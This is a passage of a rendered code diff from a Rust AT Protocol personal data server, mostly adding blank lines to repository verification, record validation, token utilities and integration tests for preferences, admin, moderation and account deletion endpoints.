.map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?;
155
164
Ok(doc.into_static())
156
165
}
166
+
157
167
fn verify_mst_structure(
158
168
&self,
159
169
data_cid: &Cid,
160
170
blocks: &HashMap<Cid, Bytes>,
161
171
) -> Result<(), VerifyError> {
162
172
use ipld_core::ipld::Ipld;
173
+
163
174
let mut stack = vec![*data_cid];
164
175
let mut visited = std::collections::HashSet::new();
165
176
let mut node_count = 0;
···
246
257
Ok(())
247
258
}
248
259
}
260
+
249
261
#[derive(Debug, Clone)]
250
262
pub struct VerifiedCar {
251
263
pub did: String,
···
253
265
pub data_cid: Cid,
254
266
pub prev: Option<Cid>,
255
267
}
268
+
256
269
#[cfg(test)]
257
270
#[path = "verify_tests.rs"]
258
271
mod tests;
+22
src/sync/verify_tests.rs
+22
src/sync/verify_tests.rs
···
5
5
use cid::Cid;
6
6
use sha2::{Digest, Sha256};
7
7
use std::collections::HashMap;
8
+
8
9
fn make_cid(data: &[u8]) -> Cid {
9
10
let mut hasher = Sha256::new();
10
11
hasher.update(data);
···
12
13
let multihash = multihash::Multihash::wrap(0x12, &hash).unwrap();
13
14
Cid::new_v1(0x71, multihash)
14
15
}
16
+
15
17
#[test]
16
18
fn test_verifier_creation() {
17
19
let _verifier = CarVerifier::new();
18
20
}
21
+
19
22
#[test]
20
23
fn test_verify_error_display() {
21
24
let err = VerifyError::DidMismatch {
···
31
34
let err = VerifyError::MstValidationFailed("test error".to_string());
32
35
assert!(err.to_string().contains("test error"));
33
36
}
37
+
34
38
#[test]
35
39
fn test_mst_validation_missing_root_block() {
36
40
let verifier = CarVerifier::new();
···
41
45
let err = result.unwrap_err();
42
46
assert!(matches!(err, VerifyError::BlockNotFound(_)));
43
47
}
48
+
44
49
#[test]
45
50
fn test_mst_validation_invalid_cbor() {
46
51
let verifier = CarVerifier::new();
···
53
58
let err = result.unwrap_err();
54
59
assert!(matches!(err, VerifyError::InvalidCbor(_)));
55
60
}
61
+
56
62
#[test]
57
63
fn test_mst_validation_empty_node() {
58
64
let verifier = CarVerifier::new();
···
65
71
let result = verifier.verify_mst_structure(&cid, &blocks);
66
72
assert!(result.is_ok());
67
73
}
74
+
68
75
#[test]
69
76
fn test_mst_validation_missing_left_pointer() {
70
77
use ipld_core::ipld::Ipld;
78
+
71
79
let verifier = CarVerifier::new();
72
80
let missing_left_cid = make_cid(b"missing left");
73
81
let node = Ipld::Map(std::collections::BTreeMap::from([
···
84
92
assert!(matches!(err, VerifyError::BlockNotFound(_)));
85
93
assert!(err.to_string().contains("left pointer"));
86
94
}
95
+
87
96
#[test]
88
97
fn test_mst_validation_missing_subtree() {
89
98
use ipld_core::ipld::Ipld;
99
+
90
100
let verifier = CarVerifier::new();
91
101
let missing_subtree_cid = make_cid(b"missing subtree");
92
102
let record_cid = make_cid(b"record");
···
109
119
assert!(matches!(err, VerifyError::BlockNotFound(_)));
110
120
assert!(err.to_string().contains("subtree"));
111
121
}
122
+
112
123
#[test]
113
124
fn test_mst_validation_unsorted_keys() {
114
125
use ipld_core::ipld::Ipld;
126
+
115
127
let verifier = CarVerifier::new();
116
128
let record_cid = make_cid(b"record");
117
129
let entry1 = Ipld::Map(std::collections::BTreeMap::from([
···
137
149
assert!(matches!(err, VerifyError::MstValidationFailed(_)));
138
150
assert!(err.to_string().contains("sorted"));
139
151
}
152
+
140
153
#[test]
141
154
fn test_mst_validation_sorted_keys_ok() {
142
155
use ipld_core::ipld::Ipld;
156
+
143
157
let verifier = CarVerifier::new();
144
158
let record_cid = make_cid(b"record");
145
159
let entry1 = Ipld::Map(std::collections::BTreeMap::from([
···
167
181
let result = verifier.verify_mst_structure(&cid, &blocks);
168
182
assert!(result.is_ok());
169
183
}
184
+
170
185
#[test]
171
186
fn test_mst_validation_with_valid_left_pointer() {
172
187
use ipld_core::ipld::Ipld;
188
+
173
189
let verifier = CarVerifier::new();
174
190
let left_node = Ipld::Map(std::collections::BTreeMap::from([
175
191
("e".to_string(), Ipld::List(vec![])),
···
188
204
let result = verifier.verify_mst_structure(&root_cid, &blocks);
189
205
assert!(result.is_ok());
190
206
}
207
+
191
208
#[test]
192
209
fn test_mst_validation_cycle_detection() {
193
210
let verifier = CarVerifier::new();
···
200
217
let result = verifier.verify_mst_structure(&cid, &blocks);
201
218
assert!(result.is_ok());
202
219
}
220
+
203
221
#[tokio::test]
204
222
async fn test_unsupported_did_method() {
205
223
let verifier = CarVerifier::new();
···
209
227
assert!(matches!(err, VerifyError::DidResolutionFailed(_)));
210
228
assert!(err.to_string().contains("Unsupported"));
211
229
}
230
+
212
231
#[test]
213
232
fn test_mst_validation_with_prefix_compression() {
214
233
use ipld_core::ipld::Ipld;
234
+
215
235
let verifier = CarVerifier::new();
216
236
let record_cid = make_cid(b"record");
217
237
let entry1 = Ipld::Map(std::collections::BTreeMap::from([
···
239
259
let result = verifier.verify_mst_structure(&cid, &blocks);
240
260
assert!(result.is_ok(), "Prefix-compressed keys should be validated correctly");
241
261
}
262
+
242
263
#[test]
243
264
fn test_mst_validation_prefix_compression_unsorted() {
244
265
use ipld_core::ipld::Ipld;
266
+
245
267
let verifier = CarVerifier::new();
246
268
let record_cid = make_cid(b"record");
247
269
let entry1 = Ipld::Map(std::collections::BTreeMap::from([
+16
src/util.rs
+16
src/util.rs
···
1
1
use rand::Rng;
2
2
use sqlx::PgPool;
3
3
use uuid::Uuid;
4
+
4
5
const BASE32_ALPHABET: &str = "abcdefghijklmnopqrstuvwxyz234567";
6
+
5
7
pub fn generate_token_code() -> String {
6
8
generate_token_code_parts(2, 5)
7
9
}
10
+
8
11
pub fn generate_token_code_parts(parts: usize, part_len: usize) -> String {
9
12
let mut rng = rand::thread_rng();
10
13
let chars: Vec<char> = BASE32_ALPHABET.chars().collect();
14
+
11
15
(0..parts)
12
16
.map(|_| {
13
17
(0..part_len)
···
17
21
.collect::<Vec<_>>()
18
22
.join("-")
19
23
}
24
+
20
25
#[derive(Debug)]
21
26
pub enum DbLookupError {
22
27
NotFound,
23
28
DatabaseError(sqlx::Error),
24
29
}
30
+
25
31
impl From<sqlx::Error> for DbLookupError {
26
32
fn from(e: sqlx::Error) -> Self {
27
33
DbLookupError::DatabaseError(e)
28
34
}
29
35
}
36
+
30
37
pub async fn get_user_id_by_did(db: &PgPool, did: &str) -> Result<Uuid, DbLookupError> {
31
38
sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
32
39
.fetch_optional(db)
33
40
.await?
34
41
.ok_or(DbLookupError::NotFound)
35
42
}
43
+
36
44
pub struct UserInfo {
37
45
pub id: Uuid,
38
46
pub did: String,
39
47
pub handle: String,
40
48
}
49
+
41
50
pub async fn get_user_by_did(db: &PgPool, did: &str) -> Result<UserInfo, DbLookupError> {
42
51
sqlx::query_as!(
43
52
UserInfo,
···
48
57
.await?
49
58
.ok_or(DbLookupError::NotFound)
50
59
}
60
+
51
61
pub async fn get_user_by_identifier(db: &PgPool, identifier: &str) -> Result<UserInfo, DbLookupError> {
52
62
sqlx::query_as!(
53
63
UserInfo,
···
58
68
.await?
59
69
.ok_or(DbLookupError::NotFound)
60
70
}
71
+
61
72
#[cfg(test)]
62
73
mod tests {
63
74
use super::*;
75
+
64
76
#[test]
65
77
fn test_generate_token_code() {
66
78
let code = generate_token_code();
67
79
assert_eq!(code.len(), 11);
68
80
assert!(code.contains('-'));
81
+
69
82
let parts: Vec<&str> = code.split('-').collect();
70
83
assert_eq!(parts.len(), 2);
71
84
assert_eq!(parts[0].len(), 5);
72
85
assert_eq!(parts[1].len(), 5);
86
+
73
87
for c in code.chars() {
74
88
if c != '-' {
75
89
assert!(BASE32_ALPHABET.contains(c));
76
90
}
77
91
}
78
92
}
93
+
79
94
#[test]
80
95
fn test_generate_token_code_parts() {
81
96
let code = generate_token_code_parts(3, 4);
82
97
let parts: Vec<&str> = code.split('-').collect();
83
98
assert_eq!(parts.len(), 3);
99
+
84
100
for part in parts {
85
101
assert_eq!(part.len(), 4);
86
102
}
+30
src/validation/mod.rs
+30
src/validation/mod.rs
···
1
1
use serde_json::Value;
2
2
use thiserror::Error;
3
+
3
4
#[derive(Debug, Error)]
4
5
pub enum ValidationError {
5
6
#[error("No $type provided")]
···
17
18
#[error("Unknown record type: {0}")]
18
19
UnknownType(String),
19
20
}
21
+
20
22
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
21
23
pub enum ValidationStatus {
22
24
Valid,
23
25
Unknown,
24
26
Invalid,
25
27
}
28
+
26
29
pub struct RecordValidator {
27
30
require_lexicon: bool,
28
31
}
32
+
29
33
impl Default for RecordValidator {
30
34
fn default() -> Self {
31
35
Self::new()
32
36
}
33
37
}
38
+
34
39
impl RecordValidator {
35
40
pub fn new() -> Self {
36
41
Self {
37
42
require_lexicon: false,
38
43
}
39
44
}
45
+
40
46
pub fn require_lexicon(mut self, require: bool) -> Self {
41
47
self.require_lexicon = require;
42
48
self
43
49
}
50
+
44
51
pub fn validate(
45
52
&self,
46
53
record: &Value,
···
83
90
}
84
91
Ok(ValidationStatus::Valid)
85
92
}
93
+
86
94
fn validate_post(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
87
95
if !obj.contains_key("text") {
88
96
return Err(ValidationError::MissingField("text".to_string()));
···
127
135
}
128
136
Ok(())
129
137
}
138
+
130
139
fn validate_profile(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
131
140
if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) {
132
141
let grapheme_count = display_name.chars().count();
···
148
157
}
149
158
Ok(())
150
159
}
160
+
151
161
fn validate_like(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
152
162
if !obj.contains_key("subject") {
153
163
return Err(ValidationError::MissingField("subject".to_string()));
···
158
168
self.validate_strong_ref(obj.get("subject"), "subject")?;
159
169
Ok(())
160
170
}
171
+
161
172
fn validate_repost(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
162
173
if !obj.contains_key("subject") {
163
174
return Err(ValidationError::MissingField("subject".to_string()));
···
168
179
self.validate_strong_ref(obj.get("subject"), "subject")?;
169
180
Ok(())
170
181
}
182
+
171
183
fn validate_follow(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
172
184
if !obj.contains_key("subject") {
173
185
return Err(ValidationError::MissingField("subject".to_string()));
···
185
197
}
186
198
Ok(())
187
199
}
200
+
188
201
fn validate_block(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
189
202
if !obj.contains_key("subject") {
190
203
return Err(ValidationError::MissingField("subject".to_string()));
···
202
215
}
203
216
Ok(())
204
217
}
218
+
205
219
fn validate_list(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
206
220
if !obj.contains_key("name") {
207
221
return Err(ValidationError::MissingField("name".to_string()));
···
222
236
}
223
237
Ok(())
224
238
}
239
+
225
240
fn validate_list_item(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
226
241
if !obj.contains_key("subject") {
227
242
return Err(ValidationError::MissingField("subject".to_string()));
···
234
249
}
235
250
Ok(())
236
251
}
252
+
237
253
fn validate_feed_generator(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
238
254
if !obj.contains_key("did") {
239
255
return Err(ValidationError::MissingField("did".to_string()));
···
254
270
}
255
271
Ok(())
256
272
}
273
+
257
274
fn validate_threadgate(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
258
275
if !obj.contains_key("post") {
259
276
return Err(ValidationError::MissingField("post".to_string()));
···
263
280
}
264
281
Ok(())
265
282
}
283
+
266
284
fn validate_labeler_service(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
267
285
if !obj.contains_key("policies") {
268
286
return Err(ValidationError::MissingField("policies".to_string()));
···
272
290
}
273
291
Ok(())
274
292
}
293
+
275
294
fn validate_strong_ref(&self, value: Option<&Value>, path: &str) -> Result<(), ValidationError> {
276
295
let obj = value
277
296
.and_then(|v| v.as_object())
···
296
315
Ok(())
297
316
}
298
317
}
318
+
299
319
fn validate_datetime(value: &str, path: &str) -> Result<(), ValidationError> {
300
320
if chrono::DateTime::parse_from_rfc3339(value).is_err() {
301
321
return Err(ValidationError::InvalidDatetime {
···
304
324
}
305
325
Ok(())
306
326
}
327
+
307
328
pub fn validate_record_key(rkey: &str) -> Result<(), ValidationError> {
308
329
if rkey.is_empty() {
309
330
return Err(ValidationError::InvalidRecord("Record key cannot be empty".to_string()));
···
324
345
}
325
346
Ok(())
326
347
}
348
+
327
349
pub fn validate_collection_nsid(collection: &str) -> Result<(), ValidationError> {
328
350
if collection.is_empty() {
329
351
return Err(ValidationError::InvalidRecord("Collection NSID cannot be empty".to_string()));
···
348
370
}
349
371
Ok(())
350
372
}
373
+
351
374
#[cfg(test)]
352
375
mod tests {
353
376
use super::*;
354
377
use serde_json::json;
378
+
355
379
#[test]
356
380
fn test_validate_post() {
357
381
let validator = RecordValidator::new();
···
365
389
ValidationStatus::Valid
366
390
);
367
391
}
392
+
368
393
#[test]
369
394
fn test_validate_post_missing_text() {
370
395
let validator = RecordValidator::new();
···
374
399
});
375
400
assert!(validator.validate(&invalid_post, "app.bsky.feed.post").is_err());
376
401
}
402
+
377
403
#[test]
378
404
fn test_validate_type_mismatch() {
379
405
let validator = RecordValidator::new();
···
385
411
let result = validator.validate(&record, "app.bsky.feed.post");
386
412
assert!(matches!(result, Err(ValidationError::TypeMismatch { .. })));
387
413
}
414
+
388
415
#[test]
389
416
fn test_validate_unknown_type() {
390
417
let validator = RecordValidator::new();
···
397
424
ValidationStatus::Unknown
398
425
);
399
426
}
427
+
400
428
#[test]
401
429
fn test_validate_unknown_type_strict() {
402
430
let validator = RecordValidator::new().require_lexicon(true);
···
407
435
let result = validator.validate(&record, "com.example.custom");
408
436
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
409
437
}
438
+
410
439
#[test]
411
440
fn test_validate_record_key() {
412
441
assert!(validate_record_key("valid-key_123").is_ok());
···
416
445
assert!(validate_record_key("").is_err());
417
446
assert!(validate_record_key("invalid/key").is_err());
418
447
}
448
+
419
449
#[test]
420
450
fn test_validate_collection_nsid() {
421
451
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
+11
tests/actor.rs
+11
tests/actor.rs
···
1
1
mod common;
2
2
use common::{base_url, client, create_account_and_login};
3
3
use serde_json::{json, Value};
4
+
4
5
#[tokio::test]
5
6
async fn test_get_preferences_empty() {
6
7
let client = client();
···
17
18
assert!(body.get("preferences").is_some());
18
19
assert!(body["preferences"].as_array().unwrap().is_empty());
19
20
}
21
+
20
22
#[tokio::test]
21
23
async fn test_get_preferences_no_auth() {
22
24
let client = client();
···
28
30
.unwrap();
29
31
assert_eq!(resp.status(), 401);
30
32
}
33
+
31
34
#[tokio::test]
32
35
async fn test_put_preferences_success() {
33
36
let client = client();
···
70
73
assert!(adult_pref.is_some());
71
74
assert_eq!(adult_pref.unwrap()["enabled"], true);
72
75
}
76
+
73
77
#[tokio::test]
74
78
async fn test_put_preferences_no_auth() {
75
79
let client = client();
···
85
89
.unwrap();
86
90
assert_eq!(resp.status(), 401);
87
91
}
92
+
88
93
#[tokio::test]
89
94
async fn test_put_preferences_missing_type() {
90
95
let client = client();
···
108
113
let body: Value = resp.json().await.unwrap();
109
114
assert_eq!(body["error"], "InvalidRequest");
110
115
}
116
+
111
117
#[tokio::test]
112
118
async fn test_put_preferences_invalid_namespace() {
113
119
let client = client();
···
132
138
let body: Value = resp.json().await.unwrap();
133
139
assert_eq!(body["error"], "InvalidRequest");
134
140
}
141
+
135
142
#[tokio::test]
136
143
async fn test_put_preferences_read_only_rejected() {
137
144
let client = client();
···
156
163
let body: Value = resp.json().await.unwrap();
157
164
assert_eq!(body["error"], "InvalidRequest");
158
165
}
166
+
159
167
#[tokio::test]
160
168
async fn test_put_preferences_replaces_all() {
161
169
let client = client();
···
208
216
assert_eq!(prefs_arr.len(), 1);
209
217
assert_eq!(prefs_arr[0]["$type"], "app.bsky.actor.defs#threadViewPref");
210
218
}
219
+
211
220
#[tokio::test]
212
221
async fn test_put_preferences_saved_feeds() {
213
222
let client = client();
···
249
258
assert_eq!(saved_feeds["$type"], "app.bsky.actor.defs#savedFeedsPrefV2");
250
259
assert!(saved_feeds["items"].as_array().unwrap().len() == 1);
251
260
}
261
+
252
262
#[tokio::test]
253
263
async fn test_put_preferences_muted_words() {
254
264
let client = client();
···
286
296
let prefs_arr = body["preferences"].as_array().unwrap();
287
297
assert_eq!(prefs_arr[0]["$type"], "app.bsky.actor.defs#mutedWordsPref");
288
298
}
299
+
289
300
#[tokio::test]
290
301
async fn test_preferences_isolation_between_users() {
291
302
let client = client();
+8
tests/admin_email.rs
+8
tests/admin_email.rs
···
1
1
mod common;
2
+
2
3
use reqwest::StatusCode;
3
4
use serde_json::{json, Value};
4
5
use sqlx::PgPool;
6
+
5
7
async fn get_pool() -> PgPool {
6
8
let conn_str = common::get_db_connection_string().await;
7
9
sqlx::postgres::PgPoolOptions::new()
···
10
12
.await
11
13
.expect("Failed to connect to test database")
12
14
}
15
+
13
16
#[tokio::test]
14
17
async fn test_send_email_success() {
15
18
let client = common::client();
···
45
48
assert_eq!(notification.subject.as_deref(), Some("Test Admin Email"));
46
49
assert!(notification.body.contains("Hello, this is a test email from the admin."));
47
50
}
51
+
48
52
#[tokio::test]
49
53
async fn test_send_email_default_subject() {
50
54
let client = common::client();
···
79
83
assert!(notification.subject.is_some());
80
84
assert!(notification.subject.unwrap().contains("Message from"));
81
85
}
86
+
82
87
#[tokio::test]
83
88
async fn test_send_email_recipient_not_found() {
84
89
let client = common::client();
···
99
104
let body: Value = res.json().await.expect("Invalid JSON");
100
105
assert_eq!(body["error"], "AccountNotFound");
101
106
}
107
+
102
108
#[tokio::test]
103
109
async fn test_send_email_missing_content() {
104
110
let client = common::client();
···
119
125
let body: Value = res.json().await.expect("Invalid JSON");
120
126
assert_eq!(body["error"], "InvalidRequest");
121
127
}
128
+
122
129
#[tokio::test]
123
130
async fn test_send_email_missing_recipient() {
124
131
let client = common::client();
···
139
146
let body: Value = res.json().await.expect("Invalid JSON");
140
147
assert_eq!(body["error"], "InvalidRequest");
141
148
}
149
+
142
150
#[tokio::test]
143
151
async fn test_send_email_requires_auth() {
144
152
let client = common::client();
+12
tests/admin_invite.rs
+12
tests/admin_invite.rs
···
1
1
mod common;
2
+
2
3
use common::*;
3
4
use reqwest::StatusCode;
4
5
use serde_json::{Value, json};
6
+
5
7
#[tokio::test]
6
8
async fn test_admin_get_invite_codes_success() {
7
9
let client = client();
···
32
34
let body: Value = res.json().await.expect("Response was not valid JSON");
33
35
assert!(body["codes"].is_array());
34
36
}
37
+
35
38
#[tokio::test]
36
39
async fn test_admin_get_invite_codes_with_limit() {
37
40
let client = client();
···
65
68
let codes = body["codes"].as_array().unwrap();
66
69
assert!(codes.len() <= 2);
67
70
}
71
+
68
72
#[tokio::test]
69
73
async fn test_admin_get_invite_codes_no_auth() {
70
74
let client = client();
···
78
82
.expect("Failed to send request");
79
83
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
80
84
}
85
+
81
86
#[tokio::test]
82
87
async fn test_disable_account_invites_success() {
83
88
let client = client();
···
113
118
let body: Value = res.json().await.expect("Response was not valid JSON");
114
119
assert_eq!(body["error"], "InvitesDisabled");
115
120
}
121
+
116
122
#[tokio::test]
117
123
async fn test_enable_account_invites_success() {
118
124
let client = client();
···
158
164
.expect("Failed to send request");
159
165
assert_eq!(res.status(), StatusCode::OK);
160
166
}
167
+
161
168
#[tokio::test]
162
169
async fn test_disable_account_invites_no_auth() {
163
170
let client = client();
···
175
182
.expect("Failed to send request");
176
183
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
177
184
}
185
+
178
186
#[tokio::test]
179
187
async fn test_disable_account_invites_not_found() {
180
188
let client = client();
···
194
202
.expect("Failed to send request");
195
203
assert_eq!(res.status(), StatusCode::NOT_FOUND);
196
204
}
205
+
197
206
#[tokio::test]
198
207
async fn test_disable_invite_codes_by_code() {
199
208
let client = client();
···
242
251
assert!(disabled_code.is_some());
243
252
assert_eq!(disabled_code.unwrap()["disabled"], true);
244
253
}
254
+
245
255
#[tokio::test]
246
256
async fn test_disable_invite_codes_by_account() {
247
257
let client = client();
···
289
299
assert_eq!(code["disabled"], true);
290
300
}
291
301
}
302
+
292
303
#[tokio::test]
293
304
async fn test_disable_invite_codes_no_auth() {
294
305
let client = client();
···
306
317
.expect("Failed to send request");
307
318
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
308
319
}
320
+
309
321
#[tokio::test]
310
322
async fn test_admin_enable_account_invites_not_found() {
311
323
let client = client();
+10
tests/admin_moderation.rs
+10
tests/admin_moderation.rs
···
1
1
mod common;
2
+
2
3
use common::*;
3
4
use reqwest::StatusCode;
4
5
use serde_json::{Value, json};
6
+
5
7
#[tokio::test]
6
8
async fn test_get_subject_status_user_success() {
7
9
let client = client();
···
22
24
assert_eq!(body["subject"]["$type"], "com.atproto.admin.defs#repoRef");
23
25
assert_eq!(body["subject"]["did"], did);
24
26
}
27
+
25
28
#[tokio::test]
26
29
async fn test_get_subject_status_not_found() {
27
30
let client = client();
···
40
43
let body: Value = res.json().await.expect("Response was not valid JSON");
41
44
assert_eq!(body["error"], "SubjectNotFound");
42
45
}
46
+
43
47
#[tokio::test]
44
48
async fn test_get_subject_status_no_param() {
45
49
let client = client();
···
57
61
let body: Value = res.json().await.expect("Response was not valid JSON");
58
62
assert_eq!(body["error"], "InvalidRequest");
59
63
}
64
+
60
65
#[tokio::test]
61
66
async fn test_get_subject_status_no_auth() {
62
67
let client = client();
···
71
76
.expect("Failed to send request");
72
77
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
73
78
}
79
+
74
80
#[tokio::test]
75
81
async fn test_update_subject_status_takedown_user() {
76
82
let client = client();
···
115
121
assert_eq!(status_body["takedown"]["applied"], true);
116
122
assert_eq!(status_body["takedown"]["ref"], "mod-action-123");
117
123
}
124
+
118
125
#[tokio::test]
119
126
async fn test_update_subject_status_remove_takedown() {
120
127
let client = client();
···
171
178
let status_body: Value = status_res.json().await.unwrap();
172
179
assert!(status_body["takedown"].is_null() || !status_body["takedown"]["applied"].as_bool().unwrap_or(false));
173
180
}
181
+
174
182
#[tokio::test]
175
183
async fn test_update_subject_status_deactivate_user() {
176
184
let client = client();
···
209
217
assert!(status_body["deactivated"].is_object());
210
218
assert_eq!(status_body["deactivated"]["applied"], true);
211
219
}
220
+
212
221
#[tokio::test]
213
222
async fn test_update_subject_status_invalid_type() {
214
223
let client = client();
···
236
245
let body: Value = res.json().await.expect("Response was not valid JSON");
237
246
assert_eq!(body["error"], "InvalidRequest");
238
247
}
248
+
239
249
#[tokio::test]
240
250
async fn test_update_subject_status_no_auth() {
241
251
let client = client();
+6
tests/appview_integration.rs
+6
tests/appview_integration.rs
···
1
1
mod common;
2
+
2
3
use common::{base_url, client, create_account_and_login};
3
4
use reqwest::StatusCode;
4
5
use serde_json::{json, Value};
6
+
5
7
#[tokio::test]
6
8
async fn test_get_author_feed_returns_appview_data() {
7
9
let client = client();
···
27
29
"Post text should match appview response"
28
30
);
29
31
}
32
+
30
33
#[tokio::test]
31
34
async fn test_get_actor_likes_returns_appview_data() {
32
35
let client = client();
···
52
55
"Post text should match appview response"
53
56
);
54
57
}
58
+
55
59
#[tokio::test]
56
60
async fn test_get_post_thread_returns_appview_data() {
57
61
let client = client();
···
80
84
"Post text should match appview response"
81
85
);
82
86
}
87
+
83
88
#[tokio::test]
84
89
async fn test_get_feed_returns_appview_data() {
85
90
let client = client();
···
105
110
"Post text should match appview response"
106
111
);
107
112
}
113
+
108
114
#[tokio::test]
109
115
async fn test_register_push_proxies_to_appview() {
110
116
let client = client();
+17
tests/common/mod.rs
+17
tests/common/mod.rs
···
14
14
use tokio::net::TcpListener;
15
15
use wiremock::matchers::{method, path};
16
16
use wiremock::{Mock, MockServer, ResponseTemplate};
17
+
17
18
static SERVER_URL: OnceLock<String> = OnceLock::new();
18
19
static APP_PORT: OnceLock<u16> = OnceLock::new();
19
20
static MOCK_APPVIEW: OnceLock<MockServer> = OnceLock::new();
21
+
20
22
#[cfg(not(feature = "external-infra"))]
21
23
use testcontainers::core::ContainerPort;
22
24
#[cfg(not(feature = "external-infra"))]
···
27
29
static DB_CONTAINER: OnceLock<ContainerAsync<Postgres>> = OnceLock::new();
28
30
#[cfg(not(feature = "external-infra"))]
29
31
static S3_CONTAINER: OnceLock<ContainerAsync<GenericImage>> = OnceLock::new();
32
+
30
33
#[allow(dead_code)]
31
34
pub const AUTH_TOKEN: &str = "test-token";
32
35
#[allow(dead_code)]
···
35
38
pub const AUTH_DID: &str = "did:plc:fake";
36
39
#[allow(dead_code)]
37
40
pub const TARGET_DID: &str = "did:plc:target";
41
+
38
42
fn has_external_infra() -> bool {
39
43
std::env::var("BSPDS_TEST_INFRA_READY").is_ok()
40
44
|| (std::env::var("DATABASE_URL").is_ok() && std::env::var("S3_ENDPOINT").is_ok())
···
54
58
.args(&["container", "prune", "-f", "--filter", "label=bspds_test=true"])
55
59
.output();
56
60
}
61
+
57
62
#[allow(dead_code)]
58
63
pub fn client() -> Client {
59
64
Client::new()
60
65
}
66
+
61
67
#[allow(dead_code)]
62
68
pub fn app_port() -> u16 {
63
69
*APP_PORT.get().expect("APP_PORT not initialized")
64
70
}
71
+
65
72
pub async fn base_url() -> &'static str {
66
73
SERVER_URL.get_or_init(|| {
67
74
let (tx, rx) = std::sync::mpsc::channel();
···
94
101
rx.recv().expect("Failed to start test server")
95
102
})
96
103
}
104
+
97
105
async fn setup_with_external_infra() -> String {
98
106
let database_url = std::env::var("DATABASE_URL")
99
107
.expect("DATABASE_URL must be set when using external infra");
···
114
122
MOCK_APPVIEW.set(mock_server).ok();
115
123
spawn_app(database_url).await
116
124
}
125
+
117
126
#[cfg(not(feature = "external-infra"))]
118
127
async fn setup_with_testcontainers() -> String {
119
128
let s3_container = GenericImage::new("minio/minio", "latest")
···
177
186
DB_CONTAINER.set(container).ok();
178
187
spawn_app(connection_string).await
179
188
}
189
+
180
190
#[cfg(feature = "external-infra")]
181
191
async fn setup_with_testcontainers() -> String {
182
192
panic!("Testcontainers disabled with external-infra feature. Set DATABASE_URL and S3_ENDPOINT.");
183
193
}
194
+
184
195
async fn setup_mock_appview(mock_server: &MockServer) {
185
196
Mock::given(method("GET"))
186
197
.and(path("/xrpc/app.bsky.actor.getProfile"))
···
310
321
.mount(mock_server)
311
322
.await;
312
323
}
324
+
313
325
async fn spawn_app(database_url: String) -> String {
314
326
use bspds::rate_limit::RateLimiters;
315
327
let pool = PgPoolOptions::new()
···
342
354
});
343
355
format!("http://{}", addr)
344
356
}
357
+
345
358
#[allow(dead_code)]
346
359
pub async fn get_db_connection_string() -> String {
347
360
base_url().await;
···
360
373
}
361
374
}
362
375
}
376
+
363
377
#[allow(dead_code)]
364
378
pub async fn verify_new_account(client: &Client, did: &str) -> String {
365
379
let conn_str = get_db_connection_string().await;
···
396
410
.expect("No accessJwt in confirmSignup response")
397
411
.to_string()
398
412
}
413
+
399
414
#[allow(dead_code)]
400
415
pub async fn upload_test_blob(client: &Client, data: &'static str, mime: &'static str) -> Value {
401
416
let res = client
···
413
428
let body: Value = res.json().await.expect("Blob upload response was not JSON");
414
429
body["blob"].clone()
415
430
}
431
+
416
432
#[allow(dead_code)]
417
433
pub async fn create_test_post(
418
434
client: &Client,
···
463
479
.to_string();
464
480
(uri, cid, rkey)
465
481
}
482
+
466
483
#[allow(dead_code)]
467
484
pub async fn create_account_and_login(client: &Client) -> (String, String) {
468
485
let mut last_error = String::new();
+10
tests/delete_account.rs
+10
tests/delete_account.rs
···
5
5
use reqwest::StatusCode;
6
6
use serde_json::{Value, json};
7
7
use sqlx::PgPool;
8
+
8
9
async fn get_pool() -> PgPool {
9
10
let conn_str = get_db_connection_string().await;
10
11
sqlx::postgres::PgPoolOptions::new()
···
13
14
.await
14
15
.expect("Failed to connect to test database")
15
16
}
17
+
16
18
async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str, password: &str) -> (String, String) {
17
19
let res = client
18
20
.post(format!("{}/xrpc/com.atproto.server.createAccount", base_url))
···
30
32
let jwt = verify_new_account(client, &did).await;
31
33
(did, jwt)
32
34
}
35
+
33
36
#[tokio::test]
34
37
async fn test_delete_account_full_flow() {
35
38
let client = client();
···
86
89
.expect("Failed to check session");
87
90
assert_eq!(session_res.status(), StatusCode::UNAUTHORIZED);
88
91
}
92
+
89
93
#[tokio::test]
90
94
async fn test_delete_account_wrong_password() {
91
95
let client = client();
···
129
133
let body: Value = delete_res.json().await.unwrap();
130
134
assert_eq!(body["error"], "AuthenticationFailed");
131
135
}
136
+
132
137
#[tokio::test]
133
138
async fn test_delete_account_invalid_token() {
134
139
let client = client();
···
171
176
let body: Value = delete_res.json().await.unwrap();
172
177
assert_eq!(body["error"], "InvalidToken");
173
178
}
179
+
174
180
#[tokio::test]
175
181
async fn test_delete_account_expired_token() {
176
182
let client = client();
···
221
227
let body: Value = delete_res.json().await.unwrap();
222
228
assert_eq!(body["error"], "ExpiredToken");
223
229
}
230
+
224
231
#[tokio::test]
225
232
async fn test_delete_account_token_mismatch() {
226
233
let client = client();
···
268
275
let body: Value = delete_res.json().await.unwrap();
269
276
assert_eq!(body["error"], "InvalidToken");
270
277
}
278
+
271
279
#[tokio::test]
272
280
async fn test_delete_account_with_app_password() {
273
281
let client = client();
···
327
335
.expect("Failed to query user");
328
336
assert!(user_row.is_none(), "User should be deleted from database");
329
337
}
338
+
330
339
#[tokio::test]
331
340
async fn test_delete_account_missing_fields() {
332
341
